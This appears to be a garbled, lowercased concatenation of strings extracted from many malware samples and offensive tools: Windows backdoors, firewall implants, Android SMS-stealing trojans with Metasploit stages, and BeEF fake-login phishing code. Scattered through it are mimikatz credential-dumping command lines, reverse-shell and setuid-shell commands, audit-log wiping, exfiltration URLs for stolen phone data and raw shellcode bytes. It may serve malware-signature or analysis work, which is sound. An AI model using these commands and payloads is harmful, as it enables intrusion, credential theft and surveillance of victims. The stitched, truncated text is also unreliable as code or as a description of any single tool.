nt\\currentversion\\hotfixcreatemutexadvapi32.dllregqueryvalueexaregopenkeyexaregcreatekeyaduplicatetokenexopenprocesstokenlookupprivilegevalueakernel32.dllgetprivateprofileintagetprivateprofilestringawriteprivateprofilestringadeletefileacreatefileafindfirstfileamovefileexafindcloseuser32.dllunhookwindowshookexsetwindowshookexacallnexthookexsoftware\\\\oracle\\\\virtualbox guest additionsvmmouse.sysvmware virtual ide hard drivesystem\\controlset001\\services\\disk\\enumsystem\\\\controlset001\\\\services\\\\disk\\\\enumvmhgfs.sysvmcivmtoolsvmware2vmount2vmusrvcvboxservicevboxtrayxenservice
1 cryptprotect_promptstructdiscomousegetdeepinfoaes_encryptstartudpfloodb
1 gk%1_slocal t = w.exec2str(\"regedit local r = w.exec2str(\"catap*.txt link*.txt node*.tun virtualencryptednetwork.licencemove o fakevirtualencryptednetwork.dllsinfo | basex b 32url | dext l 30w.exec2str(execstr)netnfo irc | basex b 32urlw.exec(\"wfw status\")exec(\"samdump\")cat virtualencryptednetwork.ini|grepif string.lower(k) == \"securityproviders\" thenexec2str(\"plist b | grep netsvcs\").*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*sauron_kblog_key =resolve hosts that answerprint only replying ipsdo not display mac addressesinject using process name or pid. defaultconvert mode: read log from file and convert to textmaximum running time in seconds64, 64url, 32, 32url or 16.force decoding when input is invalid/corruptthis cruftassemble rows of dns names back to a single string of dataremoves checks of dns names and lengths (during split)randomize data lengths (length/2 to length)n
1 downloadfile - exception:%s,code:0x%08x.mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)cdllapp::initinstance() - evnet already exists../emptycriss <target ip>cut and paste the following to the telnet prompt:environ define ttyprompt abcdefrunning \\\"tcpdump -n -n\\\", on the environment variable \\$interface, scriptedcannot read $opetc/scripme.override -- are you root?$env{exploit_scripme}the encryption key is ___tempfile2.outunless the -c (clobber) option is used, if two retr commands of themywarn(\"end of $destfile determined by \\\"^connection closed by foreign host\\\"\")end of $destfile determined by \"^connection closed by foreign host> /var/log/audit/audit.log; rm -f .pastables to run on target:cp /var/log/audit/audit.log .tmphere is the first good cron session fromno need to clean login lines.sh >/dev/tcp/ <&1 2>&1test: mungedport=%6d pp=%d unmunged=%6decho \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"-x [ port to start mini x server on default = 12121 ]\"callback_port=32177usage: %s -e -v -i target ip [-c cert file] [-k key file]type=licxfer&ftp=%s&source=/var/home/ftp/pub&version=na&licfile=[-l log file] [-m save mac time file(s)] [-p server port]chown root sh; chmod 4777 sh;cp /bin/sh .;chown root sh;echo clean up when elevated:exe=$dir/sbin/ey_vrupdatedel --- usage: %s -l file -w wtmp -r userroasting ->%s<- at ->%d:%d<-rbnoil -roasting ->requested forwarding of port %d but user is not root.internal error: we do not read, but chan_read_failed for istate~# - list forwarded connectionspacket_inject_ignore: blockresult = self.send_command(\"ls -al %s\" % self.options.dir)cmd += \"d=-l%s \" % self.options.listen_portuse this on target to get your rat:$ratremotename && $command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>target is not vulnerable. exitingsending final buffer: evil_blocks and shellcode...timeout waiting for daemon to die. exploit probably failed.usage: %s <host> <port> e <contents of a local file to be executed on target>writing your %s to target.(e)xploit, (r)ead, (m)ove and then write, (w)rite-c command: shell command stringcannot combine shell command mode with args to do socket reuse-r: reuse socket for nopen connection (requires -t, -d, -f, -n, no -c)firing with the same hosts, on altername ports (target is on 8080, listener on 443)recieved unknown command payload: 0x%xusage: eslide [options] <-t profile> <-l listenerip> <targetip>-------- delete key - remove a *closed* tabusage: ./exp command display_to_return_tosizeof shellcode = %dexecve failed!echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"echo \"call back port2 = ${sport}\"* * * * * root chown root %s; chmod 4755 %s; %s[-] kernel not vulnerable[-] failed to spawn shell: %s-s shell use shell instead of %susage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]error: not vulnerableport=%d connected! xxx.xxxxxxexecuting ./ebbnew_linux -r %s -v %s -a %s %s -t %s -p %s./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772version 1 - start with option #18 first, if it fails then try this option%s is a wrapper program for ebbnew_linux exploit for sparc solaris rpc services# building shellcode into exploit.%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80# starting exhaustive attack against usage: $prog [-f directory] -p prognum [-v ver] [-t proto] -i ipadr$gotsunos = ($line =~ /program version netid address service owner/ );+ bruteforce mode.+ host is not running samba!+ connecting back to: [%d.%d.%d.%d:45295]+ exploit failed, try -b to bruteforce.usage: %s [-bbccdfprsstv] [host]** significantly improve processing time-c cmd_name: strncmp() search for 1st %d chars of commands that mysql \\$d --host=\\$h --user=\\$u --password=\\\"\\$p\\\" -e \\\"select * from \\$twindow 3: $0 -uadmin -ppassword -i127.0.0.1 -dipboard -c\\\"sleep 500|nc$ua->agent(\"mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)\");$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";usage: %s -i <ip_addr/hostname> -c <command> -t <target_type> (-u <port> | -t <port>) -i target ip address / hostname note: choosing the correct target type is a bit of guesswork.solaris rpc.cmsd remote root exploitif one choice fails, you may want to try another.shellfilecompleted.1zeke_remove%s/%s server failing (looping), service terminatedgetpwnam: %s: no such userexecv %s: %m%s/%s: unknown service?usage: %s <shellcode> <output_file>here is the decoder+(encoded-decoder)+payloadusage: %s hostip port cmd [printer_name]command must be less than 61 chars__rw_read_waiting__mutexkind__rw_psharedusage: %s [-v] -t <target_ip> -p porterror - shellcode not as expected - unable to fix upwarning - core wipe mode - this will leave a core file on target[-c] wipe target core file (leaves less incriminating core on failed target)-a <jumpaddr> (shellcode address)*** insane undocumented incremental port mode!!! ***%x:%d --> %x:%d %d bytesclient: can't bind to local address, are you root?unable to register portcould not resolve destinationraw troubles$gotgs=1 if (($line =~ /scan for (sol|snmp)\\s+version/) orusage: $prog [-f file] -p prognum [-v ver] [-t proto] -i ipadr$scanth = $scanth . \" -s \" . $scanthreads;print \"java -jar jscanner.jar$scanth$list\\n\";exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");$xargs=\"-title \\\"kill process $pid?\\\" -name \\\"kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;.tmp.%d.xxxxxx[-] couldn't create temp file/boot/system.map-%s[+] shellcode prepared, re-executing[-] kernel not vulnerable: prctl[-] shell failed[!] selinux apparently enforcing. continue [y|n]? t=<target ip> [o=<port>] y=<target type>no command given!! bailing...no port. assuming 22.../tmp/ratload.tmp.shremote usage: /bin/telnet locip locport < /dev/console | /bin/sh\"uncompress -f ${name}.z && path=. ${args1} ${name} ${args2} && rm -f ${name}exploit_scripme=\"$exploit_scripme\"deftarget=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`fatal error: -x port and -n port must not be the same.example: ewok -t target publicusage: cleaner host community fake_prog-g - subset of -m that green spirit hits --- ewok versionusage: xspy -display <display> -delay <usecs> -upchown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cronusage: $0 ( -s ip port | cmd )os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$cmd\")php_script=\"$home/public_html/info$x.php\"cat > /dev/tcp/127.0.0.1/80 <<end*** sorry about the raw output, i'll leave it for now-scan winn %s oneset uremoteuploadcommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"send \"\\[ \\\"\\$bash\\\" = \\\"/bin/bash\\\" -o \\\"\\$shell\\\" = \\\"/bin/bash\\\" \\] &&system rm -f /current/tmp/ftshell.latest# ftshell -- file transfer shellwelcome to the network scanning toolscanning port %d/current/down/cmdout/scansscan for ssh versionprogram vers proto port serviceusage: %s [-v os] [-p] [-r] [-c command] [-a attacker] targetsending shellcode as part of an open command...cmdshellcodeyou will not be able to run the shellcode. exiting...e.g.: -n 1-1024,1080,6666,31337 # default is to dump out all scanned hosts found$bool .= \" -r \" if (/mibiisa.* -r/);sadmind is available on two ports, this also works)-x ip gives \\\"hostname:# users:load ...\\\" if positive xwin scanheader(\"set-cookie: bbsessionhash=\" . \\$hash . \"; path=/; httponly\");if ($code =~ /proxyhost/) {\\$rk[1] = \\$rk[1] - 1;#existsuser($u) or die \"user '$u' does not exist in database.\\n\";temp = ((left >> 1) ^ right) & 0x55555555right ^= (temp << 16) & 0xfffffffftempresult = \"\"num = self.bytes2long(data)if { [string length $uremoteuploadcommand]processuploadglobal dothisreallyquiet[-] failed to map file: %s[-] can not null terminate input data[!] name has size of 0!rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')client_auth = binascii.hexlify(lo_execute('openssl rand 16'))[%.2u%.2u%.2u%.2u%.2u%.2u]0123456789abcdefabcedf:a}%j,r
1 banner_layoutactivity_adpath_smsadpath_title_one7291-2ec9362bd699d0cd6f53a5ca6cdstart_serviceextra_key_smsandroid.provider.telephony.sms_receivedmphonenumbercnlybnq.qrk" // encrypted string "payload.dexcardholder nameinstagram.phpupd.php?text=android.app.action.add_device_admintap activate to continue with software update/upload-pictures.php?opened dialog:com/connect/myserviceandroid/os/binderandroid/app/servicedroidiandroidianserviceservicereceiverdendroidlastgamefile:///android_asset/enablecheatshttp://112.74.111.42:8000sha1-digest: oix4iywettkib4fbh7hconehuae=onlinegameprocedure_which_wap_idhttp://da.mmarket.com/mmsdk/mmsdk?func=mmsdk:posteventlogsha1-digest: +rsrtx5snjstrnt7pnaeqazy4kc=sha1-digest: rt2orts0wwtjffgletgffix1dfe=http://image.baidu.com/wisebrowse/index?tag1=%e6%98%8e%e6%98%9f&tag2=%e5%a5%b3%e6%98%8e%e6%98%9f&tag3=%e5%85%a8%e9%83%a8&pn=0&rn=10&fmpage=index&pos=magic#/channelpitchfork=022d4notlefttriangleequal=022ecsha1-digest: x27zpw9c6eyxvefuzfcl2lmumti=_znst12_vector_baseisssaissee13_m_deallocateepssjfbtp2ahr3wkc6leyon7d5gzxvismj4qulibgodlikelib.solibroot.sosilent91_arm_bin.rootlibr.solibpl_droidsonroids_gif.so41.208.110.46winmeif.myq-see.comwininit.myq-see.comsamsung.ddns.mecollge.myq-see.comsara2011.no-ip.bizandroidmanifest.xmlres/drawable-xxhdpi/ok_btn.jpgbot_idtype_password2decrypt.malloc.memset.free.pluginsms_encrypt.java_com_skymobi_pay_common_util_localdatadecrpty_encrypt.strcpy%ioperator%%imodel%%ideviceid%%ipackname%villllll280128120000z0w1e6fff4c5062fbdc9886fec93a75d2ac1121120104150z&inbox_timestamp > 0 and is_permanent=1contact_id = ? and mimetype = ?863d9effe70187254d3c5e9c76613a99nv-sa1nd your's device will reboot and!2,.b99^ggd&r-22922222222222222222q^saawat2222222222229222q^saawabuildiddcef055eee3f76cabb27b3bd7233f6e3c143d55d996634d1b761709372042474find_valid_domain6589y459zactivitylcom/android/zics/zruntimeinterfacemigfma0gcsqgsib3dqebaquaa4gnadcbiqkbgqc/jvgb0/jsrwi7i4j9iwo72kzw404kj02a97exbuefvee7yywstbkw5sylkxctaoqwwr19j0y+xb6+h2brunx307bv/qpg6dnpg+lx8fppvhbhoudgkb/xuzpaz/gjbtpwztbbmt+mi1qtrlyakdxsjgwyvopfvz82rxcablv/twidaqabmiiceaibadanbgkqhkig9w0baqefaascamiwggjeageaaogbal8m+bvt+njfalulgn0ja7vypndjtisptyd3stftr59v4tvljzjnsrdmxiupck1qhdbavx2prj7fvr6hyfg43hftsfx9ckbooc+d4vhx88++fue652apv9e5k9rp8yltondnnsgzp6yjvbneviaopfkmzzi+g8vxpzzhfwbuvx+3agmbaaecgyblyr6uoquapozqjtvia5bpx0ijej+ygybzh1qs3z9e4itz42rpkwjkchds6eia2kpolznqbbmrv4e8ut3ufcvufexjr5clgvkj+xhxxqs75+kt38wgzz1bw0pk4st1/aglrt5/netwuzmi/yfnfakrpqvrxuncxnlhmhs2eflkiqjbapgea2uxvwd0ti8cla8hiwpsncptcp41dh2h0yczrfmo2zafppjih2gqy5txszwblbjxfcy8/whryaqx0itmrgscqqdkh5u1nfprvk0hu8ibrb/lpygimz+wm/chfsc65sls/cml3u7huoj2lrgpz+bm68624h0klviqpbjpmayvbbyfakea1nnfj9uax8rdn1b3ecjpmvqqimdjwyvcnjjq7/wnj6nu3+0toxc0xrsheigtbhrfsnrxc6kfuv3budbhvwog9wjbai+frh1ekowlaqviundw6ycndwhedhysz0tdodlhp112ieign06dpsgyjsmqurntb92cjsnw82c3r2nhmicxr60cqqcn466jf9gjrzipo64oyw/elmac7vxgtegmvyz2/yfx5crclua4dygd1ju0emxpea9og/etwctv0rvpfc9ssn8vhhheeeeeebbbbbb??????;;;;;;888888444444000000,,,,,,''''''''''''######ooo###2e6081a2-a063-45c7-ab90-5db596e42c7cmsacm32.dllmain_text_tag080229013346z350717013346z0number_char_exp_signloganberryapplicationattachbasecontextobstetricres/xml/device_admin_data.xml]data:image/png;base64,ivborw0kggoaaaansuheugaaaiaaaacabamaaaaxehz4aaaagfbmvevmaxguwuwtweatweatweatweavwuwtwealnfqiaaaab3rstlmalozouetympn8xgaaabfjrefuef7t2e9l+zacx/fp1i3n7pfhxauivw7k3hway1dfonci2l61lvs8fuoxzyw22rdbbub1an4kx7kqdqcvcilgdc0aulcghzaq+j/hab2hlc5butxeeomglgzikzkaledtakm95hsjpxs6t9eyrsghzmmvuyxkolzs2axycq98gei9sqwekgyb1/inmgutfw9irdlwdwghtuqcegw5a+zigwn5aqfvjq0zviwqkywfgyjvcordffbdtgmyu80mkfc2h5soxfglxbiqyg9b2xzhgrodzagzdiofm+y0e5zjthbhurzthl9bb24m8hlfzqcxt+cysix3qmjubn9jazz3clobwirko+8izvsdmk7po4lv/yexpt/rxboi6njtciraciracita2bey0xnod4x8d5wittwfuknnravscof+aarfk/cfbtwu0cveydduycganyxpykbx+oeqkl772i7yas/+cg+zmy6m8vyfdnonqpv5nkfkvi+tvmwaxxkigrdqdgxzo7xbsqx1b9qezhpibcmhei3wqeyn9d9fr+qccji7yfdb8zv+qhaeqfajcs5k2taqqxaaaaaasuvork5cyii=device_admin_descpillagedactivityepigraphyservicexbot007:write apk file (from txt in assets) to sdcard sucessfully!4write apk (from txt in assets) file to sdcard fail!138675150963res/xml/device_admin.xmldevice registered: regid =cmvudcymjg==dxnzzcymjg==hdnrq2golmlelvyohc9y1x+nzvuejw8w3sbuacertificado # 73828394a compania tmn informa que o vosso sistema android tem vulnerabilidadeandroid.app.extra.add_explanationdevice_policycontent://sms/#admin_startkill callunstop all numbers*lcom/metasploit/stage/payloadtrustmanager;(com.metasploit.stage.payloadtrustmanagerlcom/metasploit/stage/payload$1;lcom/metasploit/stage/payload;-com.metasploit.meterpreter.androidmeterpreter,lcom/metasploit/stage/mainbroadcastreceiver;#lcom/metasploit/stage/mainactivity;lcom/metasploit/stage/a;lcom/metasploit/stage/c;lcom/metasploit/stage/b;android.engine.apktel:locknowcmd_confsms_conffilter2arnrsiec sisanirhguecisoijng tsassets/data.dbres/xml/device_admin_sample.xmlpkselen3333http://mayis24.4tubetv.xyz/dmr/yanpkiportraitcallback(android.app.extra.device_adminsmsreceiver&imsi=com.ahnlab.v3mobileplus#intercept_sms_start#intercept_sms_stop#block_numbers#wipe_datavisa electrone!qqazxs__exidx_endres/layout/notify_apkinstall.xmlpkpluginsms_decrypt__dso_handlelib/armeabi/libmylib.sout]diok\"3|0597794205new victim arrivedhttp://ksa-sef.com/hack%20mobaile/addnewsms.phphttp://ksa-sef.com/hack%20mobaile/addalllogcall.phphttp://ksa-sef.com/hack%20mobaile/addscreenshot.phphttp://ksa-sef.com/hack%20mobaile/addsms.phphttp://ksa-sef.com/hack%20mobaile/addvcf.phphttp://ksa-sef.com/hack%20mobaile/addimsi.phphttp://ksa-sef.com/hack%20mobaile/addhistoryinternet.phphttp://ksa-sef.com/hack%20mobaile/addinconinglogs.phpodnotice.txtcamera this device has camera!camera this device has nooo camera!send|1sbdbbbbbbf|k|send|372|screamsms|senssdsend|5ms5gs5anncsend|45clclca01send|999sand|timestart!s!c!r!e!a!m!server_ipserver_namecontent://sms/inboxscreamhackerscreamondroid.pnggetsrvaddrgetsrvportandroid.intent.action.start_google_servicejavascript:scrolltojavascript:document.getelementbyid('dns1')admin:101.200.147.153112.33.13.11120.76.249.59svcdownload<config><apptitle><txinicio><txiniciotitulo><txnored><txnoredtitulo><txnoredretry><txnoredsalir><laurl><txquieresalir><txquieresalirtitulo><txquieresalirsi><txquieresalirno><txfiltro><txfiltrourl><posicion>android/system/popreceiver/get-functions.php?/new-upload.php?/message.php?/get.php?cv7obbkpvc2pvjmwsfhzxhhttp://joyappstech.biz:11111/knock/i hate testers ongloballayouthttp://144.76.70.213:7777/ecspectapatronum/6589y459gj4058rtq,hu4p#ht;u!xo7t,ud+gkwg#m!lf>laq&+j{lgvar lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';dark=document.getelementbyid('darkenscreenobject'); beef.execute(function() {var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';description.text('enter your apple id e-mail address and password');sneakydiv.innerhtml= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +tivar logo = 'https://www.yammer.com/favicon.ico';beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);var title = 'session timed out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"linkedin\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"youtube\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"yammer\">';var logobox = 'style=\"border:4px #84acdd solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';sneakydiv.innerhtml= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>your session has timed out!</h2><p>forinner.append(title, description, user,password);sneakydiv.innerhtml= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_baranswer = document.getelementbyid('uname').value+':'+document.getelementbyid('pass').value;password.keydown(function(event) {j@h
1 get_badloginaddressget_lastfailedloginads_uf_encrypted_text_password_allowedget_passwordexpirationdatebin_execsql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + bin_textbox_saveptc.text=\"<a href=\\\"javascript:bin_postback('zcg_closepm','\"+bin_tobase64(de.key.tostring())+\"')\\\">close</a>\";bin_execsql(\"if object_id('bin_temp')is not null drop table bin_temp\");-slave <connecthost> <connectport> <transmithost> <transmitport>[+] make a connection to %s:%d....cmshared_get_ptr_from_atom_cmshared_get_ptr_from_atom[-] transmitport invalid.[+] waiting for client on port:%d ......\\setup.exemsi.dll.urlutmsi.dllutsetup.exeut/c del /q %sp
1 download excuteencryptorfunctionpointer %d%s\\%s.lnkmac:%s-cpu:%s-hd:%sfeed back responce of hostget token at hostdwn md5 err\
1 /c c:\\progra~1\\msbuild\\temp\\7za.exe e -oc:\\progra~1\\msbuild\\temp\\ c:\\progra~1\\msbuild\\temp\\inf.7z -p122333444455555 -y/c c:\\progra~1\\msbuild\\temp\\32.exe privilege::debug \"sekurlsa::logonpasswords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\64.exe privilege::debug \"sekurlsa::logonpasswords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\crypt.exe --encrypt c:\\progra~1\\msbuild\\temp\\public.key c:\\progra~1\\msbuild\\temp\\%s.txt c:\\progra~1\\msbuild\\temp\\%s.inc/c attrib +h +s c:\\progra~1\\msbuild\\temp
1 nullfilenameusage: %s <input file> <output file> <port1> [port2] [port3] [port4] [port5] [port6]you may enter between 1 and 6 ports to change the defaults.sprqwvusage: %s [d|e] session_key ciphertextwhere session_key and ciphertext are strings of hexd = decrypt mode, e = encrypt modebad mode, should be 'd' or 'e'wshtcpip.wshgetsocketinformation\\\\.\\%hs.?avresultip@mini_mcl_cmd_netconnections@@c
1 encryptpe_init
1 load auxiliary object=%s requested by file=%ssize of new packet, should be %d <= size <= %d bytesverbosity - show lengths, packet dumps, etc%s: error while loading shared libraries: %s%s%s%s%scannot dynamically load executablebinding file %s to %s: %s symbol `%s' [%s]randomize the initiator cookievalid commands are: smac, dmac, int, pack, done, goinvalid format suggest dmac=00:00:00:00:00:00smac=%02x:%02x:%02x:%02x:%02x:%02xnot everything is set yet%d - %d, %d%d - %lu.%lu %d.%lu%d - %d %d*** target may be susceptible to falsemorel ****** target is susceptible to falsemorel ***if (!(($srcip,$dstip,$srcport,$dstport) = ($line=~/^([a-f0-9]{8})([a-f0-9]{8})([a-f0-9]{4})([a-f0-9]{4})$/)))$ans=\"$srcip:$srcport -> $dstip:$dstport\";return \"error:$line is not a valid port\";$dstport=hextoport($dstport);sub hextoport$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;return \"error:$line is not a valid address\";print \"error: the filename or hex representation needs to be one argument try using \\\"'s\\n\";push(@octets,$byte_table{$tempi});print hextoip($argv[0]);generates the persistence file name and prints it out.name: a hostname: 'host.network.com', a decimal numeric offset within-a www.badguy.net,cname,1800,host.badguy.net \\\\what is the name of your pbd:you are now ready for a screamplowbinstore enabled implants.active connections will be maintained for this tunnel. timeout:%s: compatible with blatsting version 1.2can't find target version module!class payload:connection timed out. only a problem if the callback was not received.could not reliably detect cookie. using 'session_id'...def build_exploit_payload(self,cmd=\"/tmp/httpd\"):self.build_exploit_payload(cmd).got_loader_start_textimplantkeepgoingupgrade_implantunable to save off predefinedscans directoryre-orders the networkprofiler scans so they show up in order in the lpfailed to create version-specific payload(are you sure you did \"make [version]\" in versions?)-s/--srcip <sourceip> use given source ip (if sniffer doesn't collect source ip)convert an xml file generated by the blatsting sniffer module into a pcap capture file.(might have to delete key in ~/.ssh/known_hosts on linux box)scp bglee-should be 4bfe94b1 for clean bootloader version 3.0; scp <configured implant> <username>@<ipaddr>:onfigerror: failed to open %s: %d__libc_start_main@@glibc_2.0serial number: %sstrerror@@glibc_2.0error: mmap failed: %dsd_processcontrolpacketencryption_rc4setkey^get.*(?:/ |\\.(?:htm|asp|php)).*\\r\\nthis program will configure a jetplow userarea file.error running config_implant.note: it assumes you are operating in the install/lp/jp directory. this assumption first ip address for beacon destination [127.0.0.1]are you sure? don't forget that netscreen firewalls require bananaliar!! loadedpagetable.chandler_readbiosmacdef init > /tmp/.netrc;/usr/bin/wget http://home=/tmp ftp >> /tmp/.netrc;/usr/rapidstream/bin/tftpcreated shell_command:rm -f /tmp/.netrc;echo quit >> /tmp/.netrc;echo binary >> /tmp/.netrc;chmod 600 /tmp/.netrc;created cli_command:firefox http://127.0.0.1:8000/$_namewhat is the name of your implant:killall thttpdcopy http://<ip>:80/$_name flash:/$_nameexecute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07
1 cmd.exe /c %s > %sexecute cmd timeout.rundll32.exe \"%s\",settingdownloadfile - exception:%s.cdllapp::initinstance() - evnet create successful.uploadfile - encryptbuffer errorw
1 ./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=na -p 22 -t target_ip, --target_ip=target_ip -- either 127.0.0.1 or win ops ip./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport rhp --dport rhp--target_vers=target_vers target pix version (pix712, asa804) (required)-p dest_port, --dest_port=dest_port defaults: telnet=23, ssh=22 (optional) - change to local redirect portthis operation is complete, bananaglee willcd /current/bin/fw/bgxxxx/install/lpprofprocesspacketgettimeslotcmdhandlergetipipcmdhandlerprofstartscantmpdata.1resetcmdhandlercd /current/bin/fw/bananaglee/$bgver/install/lp/jetplow***** please place your ua in /current/bin/fw/ops *****ln -s ../jp/orig_code.bin orig_code_pixgen.bin***** welcome to jetplow *****get_lsl_interfacesencryptfc4payloadbeacon_getconfigformbeaconpacketbeacon_reconfiguredumpconfiggetstatushandlerxtractdatato disable password checking on target:[-] target is running[-] problem importing version-specific shellcode from[+] importing version-specific shellcode[-] unsupported target version, abortthe --spoof option requires 3 or 4 fields as follows redir_ip[-] timeout waiting for response - target may have crashed[-] no response from health check - target may have crashedmemset 00e9a05c 4 38845b88_hidecmdmemset 013abd04 1 0dcould not connect to target device: %s:%d. please check ip address.command data size is invalid for an exec cmda script was specified but target is not a ppc405-based netscreen (ns5xt, ns25, and ns50). executing scripts is supported but maexecute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]execute 0x%08x with args (%08x, %08x, %08x): [y/n][%d] execute code.execute 0x%08x with args (%08x): [y/n]dump_value_lhash_doall_argeggcode is complete. pass execution to it? [y/n]required by seconddatehelp='output file name (optional). by default the resulting data is written to stdout.')data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"version='%prog 1.0',usage='%prog [ ... options ... ] url',readflashhandlerflashrtnspix6x.cfix_ip_cksum_incrwriteflashhandlerusage %s \"<tcpdump pcap string>\" <outfile>error reading dump file: %struncated dump file; tried to read %u captured bytes, only got %lu%s: link-layer type %d isn't supported in savefilesdlt %d is not one of the dlts supported by this deviceusage: storefc.py --configfile=<path to xml file> --implantfile=<path to binstore implant> [--outputfile=<file to write the confraise exception, \"must supply both a config file and implant file.\"this is wrapper for store.py that felonycrowbar will use. thisdef hexdump(x,lead=\"[+] \",out=sys.stdout):print >>out, \"%s%04x \" % (lead,i),print >>out, \"%02x\" % ord(x[i+j]),print >>out, sane(x[i:i+16])components/modules/biosmodule/implant/e28f6/../e28f640j3_asm.scmosreadbytechecksumareaconfirmed.0writespeedplow.c--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)%s version %s already has persistence installed. if you want to uninstall,the active module(s) on the target are not meant to be persistedlp.c:pixsecurity - improper number of bytes read in security/interface informationlp.c:pixsecurity - not in sessiongetmodinterface__preloadedmodulesshowcommandsreadmoduleinterfacewrapping_not_necessary_or_wrapping_okget_cmd_listlp_listen2killcmdlistmodule and implant versions do not match. this module is not compatible with the target implant%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.log%s/bf_%04d%02d%02d.log%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.bin* not attempting to execute \"%s\" commandterminating script (command error or \"quit\" encountered)execute code in <file> passing <argx> (hex)* use arrow keys to scroll through command historypitcmd_processcmdlineexecute all commands in <file>__processshellcmdpittarget_getdstport__processsettargetiplogging commands and output - onthis command is too dangerous. if you'd like to run it, contact the development teamimplant version-specific values:this function should not be used with a netscreen, something has gone horribly wrongcreatesendrecv: recv'd an error from the target.error: watchdogtimeout read returned %d instead of 4command has not yet been codedbeacon domain : www.%s.comthis command can only be run on a pix/asawarning! bad or missing flash values (in section 2 of .dat file)printing the interface info and security levels. pix only.incomplete and must be removed manually.)%s: recv'd an error from the target.unable to fetch the address to the get_uptime_secs function for this os versionupload/activate/de-activate/remove/cmd function faileddo you wish to activate the implant that is already on the firewall? (y/n): there is no implant present on the firewall.implant version :%lx%lx%lxyou may now connect to the implant using the pbd idkeyno reply from persistant back door.rm -rf pbd.wc; wc -c %s > pbd.wcpbd_getversionpbd/pbdencrypt.binpbd/pbdgetversion.pktpbd/pbdstartwrite.binpbd/pbd_setnewhookpt.pktpbd/pbd_upload_singlepkt.pktunable to fetch hook and jmp addresses for this os versioncould not get hook and jump addressesenter the name of a clean implant binary (not an image):unable to read dat file for os version 0x%08lxinvalid implant fileprint \"[+] connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])@overridable(\"must be overriden if the target will be touched. base implementation should not be called.\")@overridable(\"must be overriden. base implementation should not be called.\")exp.load_vinfo()if not okay and self.terminateflingonexception:print \"[-] keyboard interrupt before response received\"if self.terminateflingonexception:print 'debug info ','='*40modules persistence file written successfullymodules persistence data successfully removedno modules are active on the firewall, nothing to persisterror while attemping to persist modules:error while reading interface info from pixlp.c:pixfree - failed to get responsewarning: lp timeout specified (%lu seconds) less than default (%u seconds). setting defaultunable to fetch config address for this os versionlp.c: interface information not available for this session[%s:%s:%d] error: extract_fgbgwarning: session may not have been closed!exec packet processedfailed to insert the command into command list.send_packet: trying to send too much data.payloadlength >= max_allow_size.wrong payload sizeunknown packet received......returned eax = %08xlogging.error(\" perhaps you should run with --scan?\")logging.error(\"error: no entry for etag [%s] in %s.\" %\"be supplied\")received prompt, we're infailed to login, bad creds, abortsending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + received nat - epba: ok, payload: mangled, did not runno status returned from target, could be an exploit failure, or this is a version where we don't expect a stus returnreceived arp - epba: ok, payload: failchopped = string.rstrip(payload, \"\\x0a\")shstrtab
